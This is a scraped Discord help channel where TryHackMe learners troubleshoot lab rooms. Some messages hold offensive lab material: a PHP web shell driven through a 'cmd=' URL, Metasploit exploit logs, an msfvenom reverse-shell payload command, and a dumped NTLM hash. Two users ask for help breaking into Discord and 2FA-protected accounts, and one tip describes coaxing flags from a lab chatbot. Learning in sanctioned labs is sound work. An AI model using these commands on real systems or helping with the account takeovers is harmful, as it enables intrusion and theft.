#room-help

1 messages · Page 3 of 1

worn torrent
#

Im stuck on the AI path, jailbreaking room, task 5 question 2 and 3. The answers seem obvious, but don't fit the structure of the required answer. I've even worked with copilot to help me out, and it keeps getting the same answers.

regal basin
worn torrent
rotund hollyBOT
#

Gave +1 Rep to @regal basin (current: #823 - 9)

regal basin
worn torrent
#

I just got question 3 to work like you said. I was thinking the other answer was gradual escalation, but that doesn't fit

worn torrent
regal basin
#

I updated the report again lol. Now I am convinced it is a bug, question 2 and question 3 are just 2 vague ways of refering to the same thing, answer to quesiton 3, and the real question 2 is missing.

worn torrent
rotund hollyBOT
#

Gave +1 Rep to @regal basin (current: #776 - 10)

regal basin
worn torrent
regal basin
worn torrent
regal basin
rotund hollyBOT
#

Gave +1 Rep to @worn torrent (current: #1483 - 4)

river prism
#

how can I fix this error : thmVNC encountered an error?

worn torrent
robust mural
#

What was the timestamp of the server response containing the payload? ---> masquerade which format is it?, and I decrypted the exe, but the question and answer to Which encryption key and algorithm does the client use? was not excepted

#

why not using wireshark UTC timestamp for the answer why guessing?

deep vessel
#

hlo

#

anyone has done ContAInment room?

golden snow
#

Test

robust mural
#

lol

vagrant fern
river prism
#

Yeah. But now the problem is clear.

cloud token
#

how can one know the exact process name here,netstat commands dont help they only list ports and some more details

cloud token
agile valley
#

Detail-Focused, Curious and Love Puzzles

Security analysts are often referred to as the digital defenders of an organisation and sit on the blue team. These people monitor, investigate and respond to activity taking place on an organisation's devices and network, and play a significant role in an organisation's defence.

Using their skills, security analysts investigate and piece together potential security incidents, known as alerts, to decide if further action is needed and respond appropriately.

An example of a potential security incident is an employee who works in the London office who suddenly logs in from another country. An investigation is required to determine if this is legitimate.

Not only that, but security analysts are one of the most in-demand roles within cyber security, offering a long and rewarding career path.

A Typical Day as a Security Analyst Involves:
Monitoring activity taking place on the devices and network of the organisation.
Investigating unusual or suspicious activity, such as strange logins.
Piecing together information to understand what has happened, when, and how.
Working with other teams to improve the organisation's defences.
Progression
Security Analyst is a broad entry point into defensive security, with many paths to specialise later. You can move into areas like threat hunting, incident response, or malware analysis. Incident responders handle active attacks, while malware analysts examine the tools and code used by attackers.

Answer the questions below
Security analysts play a significant role in an organisation’s _____?

Fill in the blank:

#

help pls

robust mural
viscid hill
regal basin
viscid hill
worn torrent
hexed stratus
#

Anyone know how to get the flag for owasp juice shop acquisitions.md I've downloaded the file and its supposed to give a flag after but I get nothing

zealous obsidian
#

I find it thanks

rotund hollyBOT
#

Gave +1 Rep to @forest pawn (current: #3730 - 1)

worn torrent
ebon gorge
#

https://tryhackme.com/room/powershell

I did this room. First couple Tasks were okay/easy
Then even the basic scripting part was kind of a big jump, had to research basic syntax like usage of curly braces, syntax of if etc.

And then the "intermediate" script was so hard that I could not finish it without almost copy-pasting a solution from an online walkthru writeup.

I finished the basic powershell room before as well as came accross with some powershell usage (powerup, Privilege escalation etc) rooms.
Did I miss something and could have found it somewhere?

It really seemed impossible to finish.

Anyone else struggled with that?

TryHackMe

Learn the basics of PowerShell and PowerShell Scripting

past hull
#

who knows how to load squawkervpn
i forgot how to start it in terminal

thin edge
#

hi my name is sean

modern wren
#

hello, trying to arpspoof and im having problems using urlsnarf in kali linux, where im trying to see the traffic between pfsense firewall router and metasploitble virtual machines, its not showing anything from the ports, if anyone knows much about this , please could they help

vagrant fern
modern wren
#

thanks

supple viper
#

Guys I need help with the wifi hacking 101 room

#

wtf do you do with the file that you download for the last module?

#

that zip file?

thick tulip
#

Minotaur's Labyrinth broken

cedar edge
vagrant fern
analog heath
# cedar edge

Yep, open chatbot, and just subsitute the last prompt, like what are these values:
DNS over HTTPS (DoH) Port , SYN flood timeout and Windows ephemeral port range size?
in format THM{___/__/_____}?

#

if still says wrong, then say its false bot will give you another flag.

mystic quiver
#

inside a computer lab the 2nd room the drag drop computer components is broken bro iv been tweaking for a good 30 mins

static gale
#

I think the “Advanced SQL Injection” room is broken. When accessing the Target IP Address, only a blank/white page appears.

indigo sluice
#

I need some help - in the Shells overview room, Task 8 question 2 . I successfully uploaded the php file to the web server and now i got access to cmd via the url but i cant navigate to the flag. gemini&chatgpt are refusing to help me

the url im using - http://serverip:port/uploads/shell.php?cmd=ls

#

the ls command returns to the browser the shell.php which i uploaded

#

where do i find that flag

indigo sluice
#

i found it kekw

timid wagon
#

Hello, I can't use Kape in Expediting Registry Analysis... the targets table only shows the header and you can't zoom out or rearrange the gui. I was able to use cmd for Task 3 but now I'm stuck on Task 6.

thick tulip
cedar yew
#

can i get help with Metasploit: Meterpreter i cant find out how to the NTLM hash of the jchambers user and the ai is stuck in a loop and when i run hashdump it crashes

wary minnow
#

Hi im not a hacker can samone who is a hacker help me with hacking a discord acc

cedar yew
void yacht
#

Hi

half sierra
#

has anyone solved intro to C2 but using his own machine?

#

not the attackbox

vagrant fern
fading kiln
#

Hello everyone, I am a new self learning DevSecOps in the making. Hope to learn, learn some more, than learn a little more 🙏🏾🙏🏾🙏🏾🙏🏾

robust mural
#

has anyone decrypt the client com from Masquerade?

#

I could only decrypt the exe

timid helm
#

has anyone completed room: Data Poisoning in RAG Systems

winged trail
#

hey all, newish to thm. im in room https://tryhackme.com/room/meterpreter

im trying to migrate to lsass.exe but meterpreter keeps diying. tried it again and now the target box took a crap. is this normal? restarting the box now and trying again.

winged trail
#

now i get this on a new target box:

[] Started reverse TCP handler on 10.64.120.203:4444
[
] 10.64.165.164:445 - Connecting to the server...
[] 10.64.165.164:445 - Authenticating to 10.64.165.164:445 as user 'ballen'...
[
] 10.64.165.164:445 - Selecting PowerShell target
[] 10.64.165.164:445 - Executing the payload...
[+] 10.64.165.164:445 - Service start timed out, OK if running a command or non-service executable...
[
] Exploit completed, but no session was created.

am i alone on this? previous room had similar issues.

winged trail
# winged trail hey all, newish to thm. im in room https://tryhackme.com/room/meterpreter im tr...

similar issue on new target box

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[-] Error while running command hashdump: undefined method `id' for nil:NilClass

Call stack:
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb:63:in report_creds' /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb:43:in block in cmd_hashdump'

#

5th time's the charm

#

dammit... target box froze up searching for the secrets file. cant catch a break

#

[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
meterpreter >
[*] 10.64.167.45 - Meterpreter session 5 closed. Reason: Died

cedar yew
winged trail
#

yea just looking for someone thats been doing this for a while to let me know if this is normal. i just finished the room. had to restart the target box like 8 times.

#

hope the pt1 cert is not like this

graceful flicker
#

Thanks – that worked!

rotund hollyBOT
#

Gave +1 Rep to @robust mural (current: #3732 - 1)

light flare
#

HI im coming towards the end of the SAl2 exam but ive really struggled with the VM's. On the following paths on the exam they did not deploy and I did what I could without the vm being deployed. This is very heartbreaking for me.

I struggled with the following :

Phishing Payroll VM (Medium)
Agenda Deception VM (low)

I do not want to start the final Vm named "no flight today" this is because ive had an issue with the vms and sla is about to expire. Please help with this issue as I only have 44 hours left of the exam.

Its taken me so long to do the exam but knowing the fact that im losing marks on the vms not being deployed is very disheartening and killed my morale. Splunk , edr and all the others were able to get deployed but on each vm section it just did not load up and the sla timer was going down.

primal pollen
#

I was following a CTF from a THM member and he uses the command "amass enum -d" on a kali machine... to find subdomains.. but when I try to do the same, show the message "The enumerations is fail, Discouveres are being migrated to local database"

so my VM its local, so how could he do it this if this is the same challenger ? cz have some task that we need go on git repo

molten cloak
#

Hi I have a problem with IDS Fundamentals, Practical Lab part. The task is to run Snort on this file and answer the questions given in this task.

Note:The file Intro_to_IDS.pcap is placed in the /etc/snort/ directory. You have to change your directory to /etc/snort and run the analysis command on that new file the same way as we did in task 4.

#

I run the command but I keep getting error, no Intro_to_IDS.pcap file. The file is obviously there

#

Can anybody tell what do I do wrong?

primal pollen
#

could u check ur permissions ls -l

#

maybe

molten cloak
#

yes

lavish lance
#

Hi all, for whatever reason most of the machines involving windows are really slow, and tend to get stuck pretty often to the point I have to restart them. Is that a common behavior? (I have a premium account if that can help)

In the room flarevm arsenal of tools for example, I'm not able to go through Task 3 because the machine get stuck almost anytime I get into the process explorer.

Actually, it freezes after a minute. Seems like this is a common issue according what can be found in THM's discord.

fluid roost
# molten cloak

You’re not in the correct directory, you are in the ~/ but the file is in /etc/snort?

primal pollen
# molten cloak

try ..
cd /etc/snort
ls
cat Intro_to_IDS.pcap

I think the problem is simply the fact that it's in the current directory.

fluid roost
# molten cloak ok

In -c you’re accessing a file from the /etc/snort directory from another directory correctly. Or cd into it like @primal pollen suggested

molten cloak
#

now I get another error

#

ERROR: /etc/snort/rules/local.rules(9) Unknown rule option: 'sid10003'

#

anybody knows what sid10003 error is?

primal pollen
#

show me the rule

#

sid

#

u need to put sid:10003 something like this

#

or sid=10003

fluid roost
molten cloak
#

The issue is that sid10003 is missing a semicolon (;) separating it from the previous rule option. I checked local.rules and it has every semicolon it needs to have

#

so it doesn't make sense now

fluid roost
molten cloak
#

Thanks

atomic aurora
#

Guys who know how use termux?

primal pollen
fluid roost
winged walrus
#

Does anyone know why Firefox will not allow me to connect through burpsuite even after downloading the certificate for portswigger

#

Im running Ubuntu Linux

#

Also the browser on burpsuite will not work either

cloud ravine
#

i have a doubt in wreath room; while doing nmap and ping sweep, i am getting different results. am i missing something ?

#

when i pivot and perform nmap scan from my kali machine, i get only 3 port again.

main garden
#

Same problem...

deft condor
#

I have tbh problems with privilege escalation on thm „Challenges“ rooms. How can I learn it? I'm a free user btw, so please don’t recommend me vip rooms xD

low topaz
#

Hi, I don't know English, so I'm asking for help. I've tried "pentesting" and various other terms, but nothing seems to fit.

What process do penetration testers follow when testing an organization for vulnerabilities?

10 letters

abstract ginkgo
#

Hey trying to do that Detecting Web DDoS room and Splunk is not running. I've tried restarting Splunk but port 8000 still doesn't show as open when I run ss. Should I just re-start the active machine?

dense aspen
#

?

torpid pulsar
low topaz
torpid pulsar
sage fox
#

Is anyone else having issues pulling up the VM in the "OS Security" room?

#

Wait, never mind. I figured it out.

eternal path
robust mural
#

this linux rootkits, how they can work with newer kernel, reptile for instance, need a kernel older than 5? I mean who uses so old kernels?

rose cypress
#

Sorry 4 that

thorny vale
alpine skiff
#

Which learning method does not require human-labeled data and can extract features from raw, unstructured input? its not unsupervised learning, the answer is 4&8words please help

shell cape
#

Hello in the wireshark intro room the text said:

Application Protocol (Layer 5):This will show details specific to the protocol used, such as HTTP, FTP, and SMB. From the Application layer of the OSI model.

But isn't application protocol layer 7 is this a mistake or can anybody explain to me why

analog heath
shell cape
analog heath
#

and OSI model says layer 7, but your wireshark is referring to TCP/IP model where application is on layer 5

shell cape
#

and not the OSI model

rotund hollyBOT
#

Gave +1 Rep to @analog heath (current: #508 - 16)

sharp dome
#

Hi guys, do you have any recommendations for rooms similar to Ra and Ra2 related to Windows AD? I enjoyed these a lot.

fluid roost
upper lark
#

I'm doing Hoppers Origin and I need to access as Administrator in TBFC.LOC. Has anyone got over this issue? I'm using Certify and Rubeus. I get the Certify ticket. However Rubeus says "Client name mismatch". Any help would be gladly appreciated.

south musk
#

I am on https://tryhackme.com/room/winadbasics room, in the instructions "Now let's use Phillip's account to try and reset Sophie's password. Here are Phillip's credentials for you to log in via RDP:", the room has me logged in as admin, but when trying to sign out, it auto logs me in as admin again, when I try to rdp, it gives an error when using Computer: "THM" and User Name: "phillip". I feel like i'm misunderstanding something if someone can clarify <#

torpid pulsar
south musk
#

Tried checking with gpt earlier and I think I’m just likely misinterpreting something since it’s mentioning to use some IP address but the tutorial doesn’t mention an IP for the phillip account

torpid pulsar
#

Hold on, looking to see what I did in that room to see if I can remember.

bronze etherBOT
#

@torpid pulsar Please slow down. Further spam will result in a short timeout.

torpid pulsar
#

Hold on, that was because of the large block of pasted text

#

I direct messaged you. The server thought I was spamming because of all of the text.

south musk
#

Ty ty, will give it a try once back home 👏

torpid pulsar
#

No prob. Hope it works!

south musk
rotund hollyBOT
#

Gave +1 Rep to @torpid pulsar (current: #3736 - 1)

torpid pulsar
#

Great! Glad I could help!

mortal galleon
#

Hi everyone, I'm in the Phishing Analysis Tools room - task 3 asks for the Talos domain reputation for malware-test.com, and expects an answer with 7 characters.
However, the current reputation for the site is 'questionable' (which obviously doesn't fit). How can I report this?

slim bison
upper lark
#

Nevermind. I think I found a solution to my problem.

rose thicket
robust mural
#

I did another approach and the key doesn't appear in my decrypted binary

vivid dirge
#

hi guys,
can someone help me with a little script problem? I guess it's easy but i couldnt find the error.

#

i did it on my own 🙂

dull apexBOT
stark elk
#

how can i restart my vm im stuck in career in cyber task 3

rich valve
#

Guys I am having a problem

#

Someone help me with that

analog heath
sharp roost
#

Hi! I'm stuck on the 'Experience Cyber Security' room, Task 4 (Become a Defender). I can't find the flag. Any hints on what to do? Thanks!

rich valve
fair stream
#

I tried a bunch of things and just gave up. md5 command on Mac works fine. Must be something with Burp Suite. Gemini says could be the OS adds hidden characters or something like that.

ripe stone
ripe stone
sharp roost
ripe stone
#

I can't find one with the name u sent b4

#

@sharp roost there is a room called become a defender but not one called experience cyber security

sharp roost
ripe stone
#

Ok cld u provide a screenshot with the name or the link to the room, I just can't seem to find it

slim bison
#

@fair stream i get the lesson focus is on Decoder, but think about workflow for your future self - pasting ssh keys into Decoder manually, one at a time is so tedious, time consuming and error prone. Let bash work for you:

ms@Mac ~/Burpfun/keys % for key in $(ls);do md5 $key;done
MD5 (key1) = b523e7a5b4e82a254f2669e46a7c012a
MD5 (key2) = 915fb4c73cc1acc350fae502f6655500
MD5 (key3) = 3166226048d6ad776370dc105d40d9f8
MD5 (key4) = c0a448edc9f1bc4b10c0ffc6eb79a005
slim bison
#

another terminal trick for mac is pbcopy<key3 to handle the copy to clipboard op, then paste into Decoder as normal

edgy path
#

Windows Threat Detection 2 Task 3 Question 1 , "Looking at Sysmon logs, what is the first command the invoice.pdf.exe executes?"

How can I find the answer? Even Echo gave me a hint (and answer) and I still can't find it in the event logs.

fair stream
primal pollen
#

hey guys.. im stuck in a room.. and is the first time im using wireshark and the question is " One of the packets contains login credentials. What password did the user submit? " .. so i tried to searching after add tls - pre-sheared-key log to see the passwords.. but nothing to find.. ive tried http2.headers.method = "POST" or strings like pass, user, pwd etc.. but nothing

slim bison
torpid pulsar
slim bison
torpid pulsar
#

I don't need help, I passed the room successfully, thankfully! Just pasted the link because I think that is the room he is talking about.

slim bison
thin forum
#

Guys, which VM would you recommend for Linux distributions?

true wind
#

Can anybody help me regain admin control on my PC

torpid pulsar
primal pollen
rotund hollyBOT
#

Gave +1 Rep to @torpid pulsar (current: #1834 - 3)

torpid pulsar
#

I did the same thing. But, I usually have ChatGPT open on another monitor. Not as a cheater, but as a guide to walk me through it a little better. Sometimes THM is not very clear! Using ChatGPT, I was able to finish it up. I can't remember exactly what I did, wasn't it like filtering for a password, right?

primal pollen
ripe stone
ripe stone
#

Ya so kali is a distribution

ripe stone
thin forum
#

Thanks bro

oblique hemlock
#

hi

gilded imp
#

Is there somebody who can help me with room Azure: Eyes Wide open.
Everytime I try to connect on PS I can only see an empty subscription and I reset te lab multiple times😭

stuck walrus
#

Is Steel Mountain room working for anyone?

vestal isle
#

hiii

shell cape
#

in tcpdump, what does length express? The number of bytes?

torpid shoal
#

HI, I have question about Week Mission ? Could someone explain me, what 8 question i should answer ?

#

"Answer 8 questions in Getting Started"

boreal aurora
#

my name is juna

eternal oxide
#

I am in the investigating windows 3.x room and need to copy paste file hashes and encoded data outside of the victim box. I need to use remmina with rdp to be able to do this. However remmina and the victim box keeps erroring out even after booting up a new attack box and victim box.

#

If I could upload a picture I would. The error is "ERRINFO_LOGOFF_BY_USER

inner viper
#

hi

woven fog
#

Can someone please help me with this?

lethal girder
woven fog
#

I've already submitted several answers and it's not giving me any feedback.

#

PenTesting, Assessment, and several others which are related to the question, and nothing

lethal girder
#

Refresh the page

#

The form says there is a problem

woven fog
#

I already refreshed the page, but it's only the answers I'm posting that I want you to check.

lethal girder
#

Have you tried planning?

woven fog
#

Planning Is very Little

lethal girder
woven fog
lethal girder
#

I'll be honest my room looks completely different from yours

#

Mine doesn't have any questions

#

Just no answer needed boxes

#

But I did it ages ago

weak ruin
#

ye same also opened the link ^^

lethal girder
woven fog
#

It was engagement, but I had misspelled the word.

lethal girder
#

Just like when you misspelt million 😂

#

Just double check your spelling mate

stark steeple
#

beep beep

torpid shoal
woven fog
#

I'm already networking, hahaha

torpid shoal
#

Sorry bro, just saw your post

woven fog
#

Dont worry

ripe stone
true wind
#

I was diddied

#

Badly

#

Haven’t seen something this bad in ages

quartz meteor
#

Hi everyone

earnest kestrel
#

hi

crystal grotto
#

Hello there is an issue in the room Request Smuggling: WebSockets.
In the task 4 we are to leverage a SSRF to trick the proxy into thinking the protocol has been successfully upgrade but in the backend, it is not. However, there is a specific problem in this particular port 8002 in this room. 8001 works fine, but in this one, the' /check-url?server= ' is not responding to any request at all. I even tried restarting the machine, but the same problem persisted. The actual root file works fine on this port however the only endpoint that is not responding is the check-url one that is crucial in solving this lab as we need this endpoint to work to make a connection to our controlled server to tunnel our request through the proxy. So, the key problem i noticed is /check-url is not reachable at all. Can anyone fix this or tell me an alternative if i have missed something on this one

#

@ruby gate

wise hazel
#

i cannot subscribe , an error accured

#

For tryhackme

#

I finally did

#

now using this machine, cannot find anything here !!!

viral grove
#

Hello , i have an issue no machine is being shown in idor as shown in the photo , if there is something wrong that i can't access it or i am doing something wrong tell me, i tried also different browsers but i think it is the same problem ; task 7

charred mauve
#

you probably need to start the attackbox aswell

#

since i think the machine in this room does not provide a split screen

#

i cant verify since the room is for premium users only

#

but thats my suspicion

wise hazel
#

i am good now, machine is working

viral grove
rotund hollyBOT
#

Gave +1 Rep to @charred mauve (current: #44 - 261)

eager smelt
#

Hello so i was doing elbandito chall and port 80 is not working which is imp to access login panel in order to complete chall.

Anyone help? It's urgent @wispy comet

#

Tried restarting many time but no use... Checked writeups also if I'm wrong but I wasn't.

wise dune
#

Burp Suite: The Basics i cannot connect http://10.48.174.18/ challenge at all.. stuck!! i cant continue challenge..

analog heath
wise dune
#

i try all of them already

summer plaza
#

are you using the attackbox in the browser

analog heath
wise dune
#

yes i try attackbox.. failed and then own .. failed..

summer plaza
#

if using the attackbox in the browser just terminate both and give it 5 minutes then go to the url

#

i will check the specific room for you now though and see if it works using attackbox in my instance

analog heath
wise dune
#

ok i will try to terminate both first..

summer plaza
#

wait

#

is it the task where you have to use foxy proxy?

#

which specific task in this room are you doing

wise dune
rotund hollyBOT
#

Gave +1 Rep to @analog heath (current: #491 - 17)

wise dune
summer plaza
#

yea if your not on the openvpn it wont work on your local machine

#

make sure you import the certificate

#

wait nvm thats burpsuite that needs a cert

#

should work fine if you just run openvpn on your local machine then use foxyproxy

#

just make sure its set up as it says in task 9

#

once you do what the task asks correctly and turn foxyproxy and intercept on

#

you will see your browser never ending load

#

because the request is actually in burpsuite intercepted

#

and you need to forward / drop the request in burpsuite

#

so that might be what your confusing the not loading with?

wise dune
wise dune
summer plaza
#

are you able to send screenshots or anything

#

and which openvpn or foxyproxy?

wise dune
#

openvpn already running

#

foxy burp on

analog heath
#

and on what port burpsuite is listening?

#

configure foxyproxy to that port.

wise dune
summer plaza
#

8080 is default yea

#

intercept is on

#

on burpsuite right

wise dune
#

yes intercept on

analog heath
summer plaza
#

double check on thm too your actually connected

#

if your using openvpn and not the attackbox

analog heath
#

@wise dune if not then go to proxy tab and start burpsuite chromium. it will mostly work.

summer plaza
#

yea just use burpsuites browser at that point

analog heath
summer plaza
#

the machine ip you can open on firefox or burpsuites browser yea

#

hes just using foxyproxy specifically so he can use firefox to capture the traffic to send to burpsuite

#

you can open the url just you wont be able to send the traffic to burpsuite

summer plaza
#

never done it sorry

summer plaza
#

he mentioned all of that in his first post and hes tried rebooting etc

wise dune
eager smelt
#

In port 80

analog heath
wise dune
#

i try to terminate now

eager smelt
wise dune
#

on my kali machine only ovpn right?

summer plaza
#

arif in my opinion

wise dune
#

terminal i mean

summer plaza
#

just try use the attackbox

#

and use burpsuites browser

#

to use burpsuite

#

in burpsuite there is the open browser option

#

this way you arent using foxyproxy or firefox

eager smelt
summer plaza
#

as this is easier than diagnosing any number of issues on your own device

analog heath
#

wait

eager smelt
#

80 is not working, 631 behind waf and 8080 is for smuggling request

crystal dragon
#

Guys how to connect OpenVPN? I imported a configuration file but it requires a username and password I don't know them

analog heath
eager smelt
#

Exactly but it was supposed to open as I saw multiple write ups to confirm

eager smelt
analog heath
#

@eager smelt

#

add that IP in /etc/hosts with Domain name elbandito.thm

#

@eager smelt it was working. we need to add hosts, and work with this domain on port 8080.

eager smelt
#

No use for port 80

#

8080 was already working

analog heath
eager smelt
#

Yeah ig room's scrips might be failed when compiling

wise dune
#

10.48.150.62 it took forever.. never open from burp browser

analog heath
analog heath
wise dune
#

it still on portswigger long time

#

its on attackbox

analog heath
wise dune
#

-- 10.48.150.62 ping statistics ---
8 packets transmitted, 8 received, 0% packet loss, time 7148ms

eager smelt
analog heath
wise dune
#

i dont know why this chat dont have upload my screenshot!

analog heath
analog heath
# wise dune

bro its working well, turn off the intercept mode 🙂

#

when it needed to capture req, on the intercept mode.

wise dune
#

its work! but without intercept anymore?

#

i try port 80

#

its back running 8080

analog heath
# wise dune

check burp suite basics room again. see how intercept works.

#

when u need to edit or modify any req, u have to intercept. if intercept is on, then u have to manually send or drop the req to work.

#

i can see many req in pending in your burp, tap them and send them, to load your page. or instead use intercept mode only when its necessary.

wise dune
analog heath
analog heath
#

so that's not a issue, its just a learning mistake, get know more about proxy tab and intercept mode.

#

ping me whenever u got stuck further.

alpine thistle
#

in the wazuh room I was stuck on this task 4 and I read walkthroughs and even watched the solution video and followed their steps still I didn't get the security event data being generated. what did i do wrong? or is it an issue of the site?

#

in fact everything I do on it, i'm getting the same error message

stuck iron
#

I need some help on the Metasploit: Exploitation module. I am using msfvenom to generate a payload for the Linux target system. I have successfully ran the .elf file on the target system and created a meterpreter session. Then proceed to run post/linux/gather/hashdump with the correct session id that has the meterpreter session but every time I do it gives me the error: Post failed: ActiveRecord::RecordInvaild Validation failed: Session can’t be blank

#

Thank you in advance

analog heath
stuck iron
#

Yeah I see it active and can switch to it

#

Type: Meterpreter x86/linux

#

Root @ IP

#

Shows the connection as well

analog heath
#

if u r root u must have read permission, if works, then again try with that hashdump module.

analog heath
stuck iron
#

That command works using my meterpreter session. I ran the post/linux/gather/hashdump exploit with the same session ID as my meterpreter but still no dice. I put “set session 6”

analog heath
#

could u try with x64 linux exploit for better communication?

stuck iron
#

Let me try that

analog heath
stuck iron
#

Ayyyyyy that worked so much better! Thank you!

wise dune
rotund hollyBOT
#

Gave +1 Rep to @analog heath (current: #470 - 18)

violet jolt
#

good evening i'm Aramat , i begin TryHachMe for beginner, i search to study cybersecurity at ITS school after work, inthe room i arrived to the third step, my answer it's ok, but i don't know why. Excusme for my english i'm italian if someone know italian i'm very happy to write in two language

torn lantern
#

Did you resolve the issue and manage to connecto to KoTH using vpn profile? Or did support help you with that? 🙂

desert dragon
#

I'm trying to do the Alfred room, and task 2 question one asks for the final size of the payload that I have to generate with msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f exe -o shell-name.exe I generated the payload, and even made sure that it worked, but I apparently do not have the right answer.

desert dragon
#

nvm, I was able to find it in a writup

azure jacinth
#

Can anyone help on SOC Metric Objectives Task 3 Question 2.

SOC team received alert after 12 minutes.
L1 moved to In Progress 10 minutes later

#

After 6 minutes the alert was escalated to L2 and they spent 35 minutes cleaning the malware
What's the MTTD, MTTA, and MTTR

#

I tried 12,10,41 | 12,16,35 and a bunch of other combos that didn't make much sense

azure jacinth
#

Nevermind, figured it out, the MTTR needs to include the 10 minutes that L1 took to move to in Progress

thin nacelle
#

I want to learn cybersecurity

#

Possibly learn how to hack or connect with likemind

zinc night
#

i have a problem, i need to switch back to my machine from attack machine and can't figure out how to do it

#

i tried escape

rustic ferry
#

Hi who can help me with a 2FA on a cracked account

proud wharf
#

hi

ripe stone
sick igloo
#

Hey im trying to purchase a premium with my Credit Card but it keeps declining. I have plenty of funds in the account any suggestions or anyone else running ino this issue

brittle mauve
#

Working on Breaching AD Room, Task 6 - does anyone know why my ||tftp wont download the bcd file|| ? tried on vpn and on attack box

ripe wagon
#

Hello, our doctor assigned us room OWASPTOP10 to complete and the room was open before, but I think due to a bunch of students accessing the room at the same time it got locked for us. I've had a friend from a different country able to access it completely fine. Could anyone help unlock this room before the due date of the assignment?

slim bison
brittle mauve
slim bison
# brittle mauve Similar issue? im big confused 🙈

it's always "DNS" check your settings

thm@THMJMP1 C:\Users\thm\Documents\mx0>tftp -i 10.200.70.202 GET "\tmp\x64{C0941F7D-407A-449E-BCC6-A7C536F55A8B}.bcd" co
nf.bcd
Transfer successful: 12288 bytes in 1 second(s), 12288 bytes/s

thm@THMJMP1 C:\Users\thm\Documents\mx0>

brittle mauve
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #364 - 26)

slim bison
manic robin
#

I think the walking an application room is messed up. I found the answer for the directory listing flag and it won’t let me put it in correctly

slim bison
manic robin
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #355 - 27)

small void
#

Did thm change their network configuration in regards to vpn <-> local machine? I cannot seem to establish a reverse shell from the target server to my local machine via vpn.

frigid stump
#

Hello,
I’m a CS student specializing in cyber security, Newer to cybersecurity but really motivated to learn. Interested in ethical hacking, blue team skills, and labs on TryHackMe. Excited to connect with people here and grow together.

exotic blade
#

Hello,
I'm here purely out of passion. I want to understand as much as possible.

jade orchid
#

Hello, I have created a room. I cloned a room to experiment with the feature, but when I tried to make changes to the difficulty and the room code, I consistently received the following error message: “Cloned rooms access cannot be downgraded.”

I have since deleted the cloned room, but I am still encountering the same error.

I would like to make the following changes:

  • Change the difficulty from Medium to Easy
  • Change the room code
slim bison
rain loom
#

hello

#

i got problem i need help

#

in red team threat intel task 7

copper silo
#

Hola........

slim bison
patent sapphire
#

Помогите пожалуйста мне пройти комнату на сайте мои ответы не принимают

surreal iris
#

hey guys, i got a problem with the open vpn client, keeps asking for creds to connect? anyone have this issue? #room-help

primal pollen
vagrant fern
vagrant fern
rain loom
vagrant fern
vagrant fern
small void
jade orchid
rotund hollyBOT
#

Gave +1 Rep to @vagrant fern (current: #11 - 942)

vagrant fern
vagrant fern
rotund hollyBOT
#

➕ Gave the role Creators-Lounge to emoji_floppy

vagrant fern
jade orchid
wind jacinth
#

I am facing error when submiting answer for offensive security intro and other module as well same error showing "Opps this page failed to load" with error Id

#

please help as im paid user

#

Oops, this page failed to load
Something went wrong while loading this page. Try refreshing to give it another shot.

Error ID:
fb02b22a9ad149488db4af69a6c2e1f4

gleaming oxide
gleaming oxide
primal pollen
#

Do you think it's beneficial for me to do CTFs where I've seen 80% of the content, but haven't seen 20% yet?

I was doing one that's categorized as "easy," but at the end, I realized in the writeups that I needed to use reverse-shell, but I haven't learned that technique yet.. im still on 70% of 101 path.. I got a little frustrated and looked at the writeup to understand, but I felt like I was cheating... by the end i understand how to do it and completed the ctf.. but was not by myself.

gleaming oxide
# primal pollen Do you think it's beneficial for me to do CTFs where I've seen 80% of the conten...

It happens - I like two strategies: time-boxing and/or rotation
Basically if I spend more than x time on a box without any progress I'll either put it away and come back to it, or peek at a write-up, one line at a time (trying not to spoil it).
At the end of the day, if you don't know a technique, no sense in staying stuck in the mud forever IMHO
(NGL I do have a no hints subfolder for my writeups I completed wthout hints))

tiny bronze
#

Is there a plugin or scanner to test whether the URL has LLM prompt word injection? Can you recommend it

dusk apex
#

Hei, everyone I am Yeeun, I am a student of cybersecurity. I have to finish about 25 tryhackme labs to complete my assignment.

#

https://tryhackme.com/room/bypassreallysimplesecurity,

can not log in

The connection has timed out

An error occurred during a connection to www.google.com.

The site could be temporarily unavailable or too busy. Try again in a few moments.
If you are unable to load any pages, check your computer’s network connection.
If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the web.

in mozilla firefox, even google.

vagrant fern
dusk apex
#

not log in, it is the connection in firefox.

#

thanks

primal pollen
eternal vapor
#

In "Carrers in Cyber" on the second task it doesnt detect that my answer is in english when it clearly in english

#

i restarted my pc the site and typed it in multiple times still doesnt work

#

even tried it in different kinds of english uk and australian

gleaming oxide
gleaming oxide
rotund hollyBOT
#

Gave +1 Rep to @gleaming oxide (current: #138 - 78)

mild viper
#

Hi

summer cove
#

hey has anyone managed to connect on OpenVPN on windows? everything is fine for me up until there's some login prompt

crisp nebula
#

Hi, I'm facing the same issue. Did you solve it?

wind jacinth
#

Please help me hrere

earnest sigil
primal pollen
slim bison
prime star
#

I'm on the Nmap basics room and I can't figure out the password for root@dull apex. I'm using ssh tryhackme@(ip address in the room), but I don't know what the password is. tryhackme doesn't work and neither does THM123.

https://tryhackme.com/room/nmap

shell osprey
#

Hi

#

I need help getting over the Security in the Pipeline Topic Transition Recap, got stuck at a question that does not look like topic recap:
"What curl command would successfully retrieve the emergency override information from the alien-loaders API endpoint on target 10.10.50.100?"
& does not accept anything from the related room it asks about.

#

This question seems to be about particular details of a gamified challenge, I don't see how it can actually qualify as a topic recap.

slim bison
dusky wave
#

any idea why I can't attach a photo?

normal basin
#

Hi everyone,
I’m currently a college student working toward a career as a SOC Analyst and I’m trying to build some hands-on projects for my resume before applying for internships.
I’ve been learning cybersecurity fundamentals through TryHackMe, and I want to create projects that actually stand out to recruiters and show practical blue-team/SOC skills.
What project ideas would you recommend for someone aiming for a SOC Analyst internship?

inner cave
#

hi everyone

#

need help on SOC simulator

muted kelp
torpid pulsar
#

